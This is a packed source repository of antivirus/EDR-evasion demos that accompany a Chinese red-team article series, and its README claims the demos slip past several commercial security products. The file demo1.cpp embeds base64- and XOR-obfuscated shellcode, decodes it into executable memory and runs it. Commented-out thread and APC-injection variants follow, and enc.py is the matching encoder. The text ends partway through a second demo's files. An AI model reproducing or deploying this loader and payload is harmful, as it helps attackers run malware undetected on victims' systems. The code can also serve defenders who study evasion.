[ { "path": "README.md", "content": "# EDR-Bypass-demo\nSome demos to bypass EDRs or AVs by 78itsT3@m\n\n## 本文为7bits系列文章《红队队开发基础-基础免杀》的示例代码\n\n### 欢迎关注我们的公众号 - Zbits2022\n\n![](/images/qrcode.jpg)\n\n### demo 1-3 为《红队队开发基础-基础免杀(一)》的内容\n\n- demo1:\n\n c++代码,使用disableETW,shellcode加密,隐藏导入表的免杀方式对shellcode进行免杀\n\n- demo2:\n\n c#代码,使用字符串加密、异或加密、沙箱绕过方式进行bypass AV。\n\n- demo3:\n\n c#代码,优化demo2的shellcode加载方式,修改SharpInjector,使用EtwpCreateEtwThread加载shellcode。\n\n### demo 4-5 为《红队队开发基础-基础免杀(二)》的内容\n\n- demo4:\n\n c++代码,最简单的syscall例子\n\n- demo5:\n\n c++代码,使用SysWhispers3的jump方法,绕过对syscall的静态检查\n\n### demo 6 为《红队开发基础-基础免杀(三)》的内容\n\n- demo6:\n\n c++代码,修改RefleXXion使其对user32.dll进行unhook。\n\n### chapter4 demo1-4为《红队开发基础-基础免杀(四)》的内容\n\n下面的例子均是忽略流量特征的情况:\n\n- demo1:base64+xor混淆shellcode,过360,火绒。\n\n![](/images/360.png)\n\n![](/images/hr.png)\n\n- demo2:加强了静态混淆,过definder,麦咖啡。\n\n![](/images/def.png)\n\n![](/images/mcafee.png)\n\n- demo3:加入syscall及apc调用方式,过卡巴斯基edr\n\n![](/images/kar.png)\n\n- demo4:加入beacon的内存加密,过eset edr\n\n![](/images/eset.png)\n\n\n" }, { "path": "chapter4-demo1/demo1/Debug/demo1.log", "content": " demo1.vcxproj -> E:\\7bits_demo\\demo1\\demo1\\Debug\\demo1.exe\r\n" }, { "path": "chapter4-demo1/demo1/Debug/demo1.tlog/demo1.lastbuildstate", "content": "#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0\r\nDebug|Win32|E:\\7bits_demo\\demo1\\demo1\\|\r\n" }, { "path": "chapter4-demo1/demo1/Header.h", "content": "#pragma once\r\n\r\nconst int XOR_KEY{ 8 };" }, { "path": "chapter4-demo1/demo1/base64.cpp", "content": "/*\n base64.cpp and base64.h\n\n base64 encoding and decoding with C++.\n More information at\n\t https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp\n\n Version: 2.rc.08 (release candidate)\n\n Copyright (C) 2004-2017, 2020, 2021 Ren?Nyffenegger\n\n This source code is provided 'as-is', without any express or implied\n warranty. In no event will the author be held liable for any damages\n arising from the use of this software.\n\n Permission is granted to anyone to use this software for any purpose,\n including commercial applications, and to alter it and redistribute it\n freely, subject to the following restrictions:\n\n 1. The origin of this source code must not be misrepresented; you must not\n\t claim that you wrote the original source code. If you use this source code\n\t in a product, an acknowledgment in the product documentation would be\n\t appreciated but is not required.\n\n 2. Altered source versions must be plainly marked as such, and must not be\n\t misrepresented as being the original source code.\n\n 3. This notice may not be removed or altered from any source distribution.\n\n Ren?Nyffenegger rene.nyffenegger@adp-gmbh.ch\n\n*/\n\n#include \"base64.h\"\n\n#include \n#include \n\n//\n// Depending on the url parameter in base64_chars, one of\n// two sets of base64 characters needs to be chosen.\n// They differ in their last two characters.\n//\nstatic const char* base64_chars[2] = {\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"+/\",\n\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"-_\" };\n\nstatic unsigned int pos_of_char(const unsigned char chr) {\n\t//\n\t// Return the position of chr within base64_encode()\n\t//\n\n\tif (chr >= 'A' && chr <= 'Z') return chr - 'A';\n\telse if (chr >= 'a' && chr <= 'z') return chr - 'a' + ('Z' - 'A') + 1;\n\telse if (chr >= '0' && chr <= '9') return chr - '0' + ('Z' - 'A') + ('z' - 'a') + 2;\n\telse if (chr == '+' || chr == '-') return 62; // Be liberal with input and accept both url ('-') and non-url ('+') base 64 characters (\n\telse if (chr == '/' || chr == '_') return 63; // Ditto for '/' and '_'\n\telse\n\t\t//\n\t\t// 2020-10-23: Throw std::exception rather than const char*\n\t\t//(Pablo Martin-Gomez, https://github.com/Bouska)\n\t\t//\n\t\tthrow std::runtime_error(\"Input is not valid base64-encoded data.\");\n}\n\nstatic std::string insert_linebreaks(std::string str, size_t distance) {\n\t//\n\t// Provided by https://github.com/JomaCorpFX, adapted by me.\n\t//\n\tif (!str.length()) {\n\t\treturn \"\";\n\t}\n\n\tsize_t pos = distance;\n\n\twhile (pos < str.size()) {\n\t\tstr.insert(pos, \"\\n\");\n\t\tpos += distance + 1;\n\t}\n\n\treturn str;\n}\n\ntemplate \nstatic std::string encode_with_line_breaks(String s) {\n\treturn insert_linebreaks(base64_encode(s, false), line_length);\n}\n\ntemplate \nstatic std::string encode_pem(String s) {\n\treturn encode_with_line_breaks(s);\n}\n\ntemplate \nstatic std::string encode_mime(String s) {\n\treturn encode_with_line_breaks(s);\n}\n\ntemplate \nstatic std::string encode(String s, bool url) {\n\treturn base64_encode(reinterpret_cast(s.data()), s.length(), url);\n}\n\nstd::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {\n\n\tsize_t len_encoded = (in_len + 2) / 3 * 4;\n\n\tunsigned char trailing_char = url ? '.' : '=';\n\n\t//\n\t// Choose set of base64 characters. They differ\n\t// for the last two positions, depending on the url\n\t// parameter.\n\t// A bool (as is the parameter url) is guaranteed\n\t// to evaluate to either 0 or 1 in C++ therefore,\n\t// the correct character set is chosen by subscripting\n\t// base64_chars with url.\n\t//\n\tconst char* base64_chars_ = base64_chars[url];\n\n\tstd::string ret;\n\tret.reserve(len_encoded);\n\n\tunsigned int pos = 0;\n\n\twhile (pos < in_len) {\n\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0xfc) >> 2]);\n\n\t\tif (pos + 1 < in_len) {\n\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 0] & 0x03) << 4) + ((bytes_to_encode[pos + 1] & 0xf0) >> 4)]);\n\n\t\t\tif (pos + 2 < in_len) {\n\t\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 1] & 0x0f) << 2) + ((bytes_to_encode[pos + 2] & 0xc0) >> 6)]);\n\t\t\t\tret.push_back(base64_chars_[bytes_to_encode[pos + 2] & 0x3f]);\n\t\t\t}\n\t\t\telse {\n\t\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 1] & 0x0f) << 2]);\n\t\t\t\tret.push_back(trailing_char);\n\t\t\t}\n\t\t}\n\t\telse {\n\n\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0x03) << 4]);\n\t\t\tret.push_back(trailing_char);\n\t\t\tret.push_back(trailing_char);\n\t\t}\n\n\t\tpos += 3;\n\t}\n\n\n\treturn ret;\n}\n\ntemplate \nstatic std::string decode(String encoded_string, bool remove_linebreaks) {\n\t//\n\t// decode(? is templated so that it can be used with String = const std::string&\n\t// or std::string_view (requires at least C++17)\n\t//\n\n\tif (encoded_string.empty()) return std::string();\n\n\tif (remove_linebreaks) {\n\n\t\tstd::string copy(encoded_string);\n\n\t\tcopy.erase(std::remove(copy.begin(), copy.end(), '\\n'), copy.end());\n\n\t\treturn base64_decode(copy, false);\n\t}\n\n\tsize_t length_of_string = encoded_string.length();\n\tsize_t pos = 0;\n\n\t//\n\t// The approximate length (bytes) of the decoded string might be one or\n\t// two bytes smaller, depending on the amount of trailing equal signs\n\t// in the encoded string. This approximation is needed to reserve\n\t// enough space in the string to be returned.\n\t//\n\tsize_t approx_length_of_decoded_string = length_of_string / 4 * 3;\n\tstd::string ret;\n\tret.reserve(approx_length_of_decoded_string);\n\n\twhile (pos < length_of_string) {\n\t\t//\n\t\t// Iterate over encoded input string in chunks. The size of all\n\t\t// chunks except the last one is 4 bytes.\n\t\t//\n\t\t// The last chunk might be padded with equal signs or dots\n\t\t// in order to make it 4 bytes in size as well, but this\n\t\t// is not required as per RFC 2045.\n\t\t//\n\t\t// All chunks except the last one produce three output bytes.\n\t\t//\n\t\t// The last chunk produces at least one and up to three bytes.\n\t\t//\n\n\t\tsize_t pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);\n\n\t\t//\n\t\t// Emit the first output byte that is produced in each chunk:\n\t\t//\n\t\tret.push_back(static_cast(((pos_of_char(encoded_string[pos + 0])) << 2) + ((pos_of_char_1 & 0x30) >> 4)));\n\n\t\tif ((pos + 2 < length_of_string) && // Check for data that is not padded with equal signs (which is allowed by RFC 2045)\n\t\t\tencoded_string[pos + 2] != '=' &&\n\t\t\tencoded_string[pos + 2] != '.' // accept URL-safe base 64 strings, too, so check for '.' also.\n\t\t\t)\n\t\t{\n\t\t\t//\n\t\t\t// Emit a chunk's second byte (which might not be produced in the last chunk).\n\t\t\t//\n\t\t\tunsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);\n\t\t\tret.push_back(static_cast(((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));\n\n\t\t\tif ((pos + 3 < length_of_string) &&\n\t\t\t\tencoded_string[pos + 3] != '=' &&\n\t\t\t\tencoded_string[pos + 3] != '.'\n\t\t\t\t)\n\t\t\t{\n\t\t\t\t//\n\t\t\t\t// Emit a chunk's third byte (which might not be produced in the last chunk).\n\t\t\t\t//\n\t\t\t\tret.push_back(static_cast(((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));\n\t\t\t}\n\t\t}\n\n\t\tpos += 4;\n\t}\n\n\treturn ret;\n}\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\nstd::string base64_encode(std::string const& s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string const& s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string const& s) {\n\treturn encode_mime(s);\n}\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\n\nstd::string base64_encode(std::string_view s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string_view s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string_view s) {\n\treturn encode_mime(s);\n}\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\n#endif // __cplusplus >= 201703L\n" }, { "path": "chapter4-demo1/demo1/base64.h", "content": "//\n// base64 encoding and decoding with C++.\n// Version: 2.rc.08 (release candidate)\n//\n\n#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\n#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\n\n#include \n\n#if __cplusplus >= 201703L\n#include \n#endif // __cplusplus >= 201703L\n\nstd::string base64_encode(std::string const& s, bool url = false);\nstd::string base64_encode_pem(std::string const& s);\nstd::string base64_encode_mime(std::string const& s);\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks = false);\nstd::string base64_encode(unsigned char const*, size_t len, bool url = false);\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\nstd::string base64_encode(std::string_view s, bool url = false);\nstd::string base64_encode_pem(std::string_view s);\nstd::string base64_encode_mime(std::string_view s);\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks = false);\n#endif // __cplusplus >= 201703L\n\n#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */\n" }, { "path": "chapter4-demo1/demo1/demo1.cpp", "content": "// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include \r\n#include \r\n#include \"header.h\"\r\n#include \"base64.h\"\r\nusing namespace std;\r\n\r\nunsigned char* ReadProcessBlob(const char* fnamSc, DWORD* szSc)\r\n{\r\n\tDWORD szRead{ 0 };\r\n\r\n\tHANDLE hFile = CreateFileA(\r\n\t\tfnamSc,\r\n\t\tGENERIC_READ,\r\n\t\tNULL,\r\n\t\tNULL,\r\n\t\tOPEN_EXISTING,\r\n\t\tFILE_ATTRIBUTE_NORMAL,\r\n\t\tNULL\r\n\t);\r\n\r\n\tif (INVALID_HANDLE_VALUE == hFile)\r\n\t\treturn nullptr;\r\n\r\n\tSIZE_T szFile = GetFileSize(hFile, NULL);\r\n\t*szSc = szFile;\r\n\r\n\tunsigned char* raw = new unsigned char[szFile];\r\n\tunsigned char* sc = new unsigned char[szFile];\r\n\r\n\tif (!ReadFile(hFile, raw, szFile, &szRead, NULL))\r\n\t\treturn nullptr;\r\n\r\n\tint i;\r\n\r\n\tfor (i = 0; i < szRead; i++) {\r\n\t\tsc[i] = raw[i] ^ XOR_KEY;\r\n\t}\r\n\r\n\treturn sc;\r\n}\r\n\r\nint main()\r\n{\r\n\tbool all_tests_passed = false;\r\n\r\n\tstd::string rest2_reference = \"9ECL7PjgwAgICElZSVhaWV5AOdptQINaaECDWhBAg1ooQIN6WEAHv0JCRTnBQDnIpDRpdAokKEnJwQVJCcnq5VpJWUCDWiiDSjRACdhuiXAQAwp9eoOIgAgICECNyHxvQAnYWINAEEyDSChBCdjrXkD3wUmDPIBACd5FOcFAOcikScnBBUkJyTDofflEC0QsAE0x2X3QUEyDSCxBCdhuSYMEQEyDSBRBCdhJgwyAQAnYSVBJUFZRUklQSVFJUkCL5ChJWvfoUElRUkCDGuFH9/f3VWIIQbZ/YWZhZm18CEleQYHuRIH5SbJEfy4P991AOcFAOdpFOchFOcFJWElYSbIyXnGv993je1JAgclJsFgICAhFOcFJWUlZYgtJWUmyX4GXzvfd41FTQIHJQDnaQYHQRTnBWmAICkiMWlpJsuNdJjP33UCBzkCLy1hiAldAgflAgdJBz8j39/f3RTnBWlpJsiUOEHP33Y3IB42VCQgIQPfHB4yECQgI49vh7AkICOCq9/f3J0V8UEwIQShDvCCeEfnGqz4QOUCZb1k9zZRfrP2kaoTlwQZQ+aY4tgZwQlaNp0lYfmGOcGoGYzblJRLD9V4TH2y6c1s4iOAMlePMttdpgghde216JUlvbWZ8MihFZ3JhZGRpJzwmOCgga2dleGl8YWpkbTMoRVtBTSg/JjgzKF9hZmxnf3soRlwoPSY5IQUCCM1l6QoDmhAeJZoutN1CPkoMbBYRT4p4JodhVtQQ/QXiL7U61RfcwKRjFq95GITSknVDXEYydGh4NjiMRT6a43pevMz6zCoiQMDcYy/1jHjhWWvhVp/6TPSIiL5RP8LaSwpz++6FswyGtYnKUJ+da0rRw4YW4GE1isJ9yBukKGBzCetRpZrAZtf8AZPUpuLRg9gLYdXFeifw5yhKxN4jy6BQV14m/VHXb2WO3XrQXc7c0CxfgIM1rYMHGVMH6y9uyurrF7uMzIg+sptJ4pFTYuzDslBKxx4+qcw2ikCPTsks2vAe8rGqLYAwlP4+eRcISbb4vape991AOcGyCAhICEmwCBgICEmxSAgICEmyUKxb7ffdQJtbW0CB70CB+UCB0kmwCCgICEGB8UmyGp6B6vfdQIvMKI3IfL5ugw9ACcuNyH3fUFBQQA0ICAgIWMvgl/X39zkxOiY5PjAmOCY5OzkIWQG3ZQ==\";\r\n\r\n\tstd::string rest2_decoded = base64_decode(rest2_reference);\r\n\r\n\tconst char* S = rest2_decoded.c_str();\r\n\r\n\r\n\tunsigned char* sc = new unsigned char[rest2_decoded.length()];\r\n\r\n\tfor (int i = 0; i < rest2_decoded.length(); i++) {\r\n\t\tsc[i] = S[i] ^ XOR_KEY;\r\n\t}\r\n\r\n\tvoid * exec = VirtualAlloc(0, rest2_decoded.length(), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tmemcpy(exec, sc, rest2_decoded.length());\r\n\t\r\n\r\n\r\n\t//unsigned const char* S=\r\n\r\n\t((void(*)())exec)();\r\n\t\r\n\r\n\t/*\r\n\tCreateThread \r\n\r\n\tHANDLE hThread = CreateThread(\r\n\t\tNULL, \r\n\t\t0, \r\n\t\t(LPTHREAD_START_ROUTINE)exec, \r\n\t\tNULL, \r\n\t\t0,\r\n\t\tNULL);\r\n\tif (hThread == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\r\n\tCloseHandle(hThread);\r\n\t*/\r\n\r\n\t/*\r\n\teariler bird APC\r\n\r\n\tSIZE_T shellSize = szSc;\r\n\tSTARTUPINFOA si = { 0 };\r\n\tPROCESS_INFORMATION pi = { 0 };\r\n\r\n\tCreateProcessA(\"C:\\\\Windows\\\\System32\\\\calc.exe\", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);\r\n\tHANDLE victimProcess = pi.hProcess;\r\n\tHANDLE threadHandle = pi.hThread;\r\n\r\n\tLPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tPTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;\r\n\r\n\tWriteProcessMemory(victimProcess, shellAddress, S, shellSize, NULL);\r\n\tQueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);\r\n\tResumeThread(threadHandle);\r\n\t*/\r\n\r\n}\r\n\r\n// Run program: Ctrl + F5 or Debug > Start Without Debugging menu\r\n// Debug program: F5 or Debug > Start Debugging menu\r\n\r\n// Tips for Getting Started: \r\n// 1. Use the Solution Explorer window to add/manage files\r\n// 2. Use the Team Explorer window to connect to source control\r\n// 3. Use the Output window to see build output and other messages\r\n// 4. Use the Error List window to view errors\r\n// 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project\r\n// 6. In the future, to open this project again, go to File > Open > Project and select the .sln file\r\n" }, { "path": "chapter4-demo1/demo1/demo1.vcxproj", "content": "\r\n\r\n \r\n \r\n Debug\r\n Win32\r\n \r\n \r\n Release\r\n Win32\r\n \r\n \r\n Debug\r\n x64\r\n \r\n \r\n Release\r\n x64\r\n \r\n \r\n \r\n 16.0\r\n {1876F365-2DEC-42C9-B80E-B631B26FCAD8}\r\n Win32Proj\r\n demo1\r\n 10.0\r\n \r\n \r\n \r\n Application\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n Unicode\r\n \r\n \r\n Application\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n Unicode\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n \r\n \r\n false\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n Disabled\r\n true\r\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n Disabled\r\n true\r\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n MaxSpeed\r\n true\r\n true\r\n true\r\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n MaxSpeed\r\n true\r\n true\r\n true\r\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "chapter4-demo1/demo1/demo1.vcxproj.filters", "content": "\r\n\r\n \r\n \r\n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\r\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\r\n \r\n \r\n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\r\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\r\n \r\n \r\n {93995380-89BD-4b04-88EB-625FBE52EBFB}\r\n h;hh;hpp;hxx;hm;inl;inc;ipp;xsd\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n Source Files\r\n \r\n \r\n \r\n \r\n Resource Files\r\n \r\n \r\n Resource Files\\Header Files\r\n \r\n \r\n" }, { "path": "chapter4-demo1/demo1/demo1.vcxproj.user", "content": "\r\n\r\n \r\n" }, { "path": "chapter4-demo1/demo1/x64/Debug/demo1.exe.recipe", "content": "\r\n\r\n \r\n \r\n C:\\Users\\Admin\\Desktop\\demo1\\x64\\Debug\\demo1.exe\r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "chapter4-demo1/demo1/x64/Debug/demo1.log", "content": " base64.cpp\r\n demo1.cpp\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(28,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(33,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(38,16): warning C4018: “<”: 有符号/无符号不匹配\r\n 正在生成代码...\r\n demo1.vcxproj -> C:\\Users\\Admin\\Desktop\\demo1\\x64\\Debug\\demo1.exe\r\n" }, { "path": "chapter4-demo1/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate", "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebug|x64|C:\\Users\\Admin\\Desktop\\demo1\\|\r\n" }, { "path": "chapter4-demo1/demo1/x64/Release/demo1.exe.recipe", "content": "\r\n\r\n \r\n \r\n C:\\Users\\Admin\\Desktop\\demo1\\x64\\Release\\demo1.exe\r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "chapter4-demo1/demo1/x64/Release/demo1.log", "content": " base64.cpp\r\n demo1.cpp\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(28,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(33,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(38,16): warning C4018: “<”: 有符号/无符号不匹配\r\n 正在生成代码\r\n Previous IPDB not found, fall back to full compilation.\r\n All 132 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.\r\n 已完成代码的生成\r\n demo1.vcxproj -> C:\\Users\\Admin\\Desktop\\demo1\\x64\\Release\\demo1.exe\r\n" }, { "path": "chapter4-demo1/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate", "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRelease|x64|C:\\Users\\Admin\\Desktop\\demo1\\|\r\n" }, { "path": "chapter4-demo1/demo1.sln", "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.28729.10\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"demo1\", \"demo1\\demo1.vcxproj\", \"{1876F365-2DEC-42C9-B80E-B631B26FCAD8}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.Build.0 = Release|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {1F8E67EA-F3B7-42DD-84B6-2CD2AC0305B7}\r\n\tEndGlobalSection\r\nEndGlobal\r\n" }, { "path": "chapter4-demo1/enc.py", "content": "import base64\r\nwith open(\"1.txt\",\"rb\") as f:\r\n all=f.read()\r\n array=[]\r\n for i in all:\r\n array.append(i^8)\r\n #print(bytearray(array))\r\n print(base64.b64encode(bytearray(array)))" }, { "path": "chapter4-demo2/demo1/Debug/demo1.log", "content": " demo1.vcxproj -> E:\\7bits_demo\\demo1\\demo1\\Debug\\demo1.exe\r\n" }, { "path": "chapter4-demo2/demo1/Debug/demo1.tlog/demo1.lastbuildstate", "content": "#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0\r\nDebug|Win32|E:\\7bits_demo\\demo1\\demo1\\|\r\n" }, { "path": "chapter4-demo2/demo1/Header.h", "content": "#pragma once\r\n\r\nconst int XOR_KEY{ 8 };\r\n#include \r\n\r\nconst std::vector VC_PREF_BASES{ (void*)0x00000000DDDD0000,\r\n (void*)0x0000000010000000,\r\n (void*)0x0000000021000000,\r\n (void*)0x0000000032000000,\r\n (void*)0x0000000043000000,\r\n (void*)0x0000000050000000,\r\n (void*)0x0000000041000000,\r\n (void*)0x0000000042000000,\r\n (void*)0x0000000040000000,\r\n (void*)0x0000000022000000 };" }, { "path": "chapter4-demo2/demo1/base64.cpp", "content": "/*\n base64.cpp and base64.h\n\n base64 encoding and decoding with C++.\n More information at\n\t https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp\n\n Version: 2.rc.08 (release candidate)\n\n Copyright (C) 2004-2017, 2020, 2021 Ren?Nyffenegger\n\n This source code is provided 'as-is', without any express or implied\n warranty. In no event will the author be held liable for any damages\n arising from the use of this software.\n\n Permission is granted to anyone to use this software for any purpose,\n including commercial applications, and to alter it and redistribute it\n freely, subject to the following restrictions:\n\n 1. The origin of this source code must not be misrepresented; you must not\n\t claim that you wrote the original source code. If you use this source code\n\t in a product, an acknowledgment in the product documentation would be\n\t appreciated but is not required.\n\n 2. Altered source versions must be plainly marked as such, and must not be\n\t misrepresented as being the original source code.\n\n 3. This notice may not be removed or altered from any source distribution.\n\n Ren?Nyffenegger rene.nyffenegger@adp-gmbh.ch\n\n*/\n\n#include \"base64.h\"\n\n#include \n#include \n\n//\n// Depending on the url parameter in base64_chars, one of\n// two sets of base64 characters needs to be chosen.\n// They differ in their last two characters.\n//\nstatic const char* base64_chars[2] = {\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"+/\",\n\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"-_\" };\n\nstatic unsigned int pos_of_char(const unsigned char chr) {\n\t//\n\t// Return the position of chr within base64_encode()\n\t//\n\n\tif (chr >= 'A' && chr <= 'Z') return chr - 'A';\n\telse if (chr >= 'a' && chr <= 'z') return chr - 'a' + ('Z' - 'A') + 1;\n\telse if (chr >= '0' && chr <= '9') return chr - '0' + ('Z' - 'A') + ('z' - 'a') + 2;\n\telse if (chr == '+' || chr == '-') return 62; // Be liberal with input and accept both url ('-') and non-url ('+') base 64 characters (\n\telse if (chr == '/' || chr == '_') return 63; // Ditto for '/' and '_'\n\telse\n\t\t//\n\t\t// 2020-10-23: Throw std::exception rather than const char*\n\t\t//(Pablo Martin-Gomez, https://github.com/Bouska)\n\t\t//\n\t\tthrow std::runtime_error(\"Input is not valid base64-encoded data.\");\n}\n\nstatic std::string insert_linebreaks(std::string str, size_t distance) {\n\t//\n\t// Provided by https://github.com/JomaCorpFX, adapted by me.\n\t//\n\tif (!str.length()) {\n\t\treturn \"\";\n\t}\n\n\tsize_t pos = distance;\n\n\twhile (pos < str.size()) {\n\t\tstr.insert(pos, \"\\n\");\n\t\tpos += distance + 1;\n\t}\n\n\treturn str;\n}\n\ntemplate \nstatic std::string encode_with_line_breaks(String s) {\n\treturn 